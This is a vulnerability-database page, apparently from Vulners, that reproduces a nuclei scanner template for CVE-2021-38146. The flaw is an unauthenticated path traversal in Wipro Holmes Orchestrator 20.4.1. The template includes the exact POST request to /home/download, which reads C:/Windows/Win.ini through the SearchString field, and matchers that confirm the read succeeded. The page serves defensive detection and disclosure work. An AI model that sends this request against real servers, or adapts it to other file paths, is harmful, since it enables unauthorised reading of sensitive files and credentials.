Lucene search
K

Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 36 Views

Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download vulnerability allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON fiel

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download Exploit
15 Nov 202100:00
zdt
ATTACKERKB
CVE-2021-38146
22 Nov 202109:15
attackerkb
Circl
CVE-2021-38146
7 Jun 202417:11
circl
CNNVD
Wipro Holmes Orchestrator 路径遍历漏洞
15 Nov 202100:00
cnnvd
CVE
CVE-2021-38146
22 Nov 202108:34
cve
Cvelist
CVE-2021-38146
22 Nov 202108:34
cvelist
NVD
CVE-2021-38146
22 Nov 202109:15
nvd
Packet Storm
Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download
15 Nov 202100:00
packetstorm
Prion
Path traversal
22 Nov 202109:15
prion
RedhatCVE
CVE-2021-38146
22 May 202521:26
redhatcve
Rows per page
id: CVE-2021-38146

info:
  name: Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download
  author: s4e-io
  severity: high
  description: |
    The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.
  impact: |
    Unauthenticated attackers can read arbitrary files from the server via path traversal in the SearchString parameter, potentially exposing sensitive configuration files, credentials, and proprietary data.
  remediation: Fixed In v21.4.0
  reference:
    - https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html
    - https://flippingbitz.com/post/wipro-ho-2041-cve/
    - https://www.wipro.com/holmes/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38146
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-38146
    cwe-id: CWE-22
    epss-score: 0.11733
    epss-percentile: 0.95563
    cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wipro
    product: holmes
    fofa-query: title="Wipro Holmes Orchestrator"
  tags: cve,cve2021,wipro,holmes,lfi,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/home/download"

    headers:
      Content-Type: application/json

    body: |
      {
        "SearchString": "C:/Windows/Win.ini",
        "Msg": ""
      }

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[fonts]"
          - "[extensions]"
          - "[files]"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c274f5dbef6cc6de1923fe887133329544216aa3a7a576a29870643e4f8016ad02200929c55062e9206f281cabfccfeb74616e9cb8f25319e13010550a04de63f598:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 25
CVSS 3.17.5
EPSS0.11733
36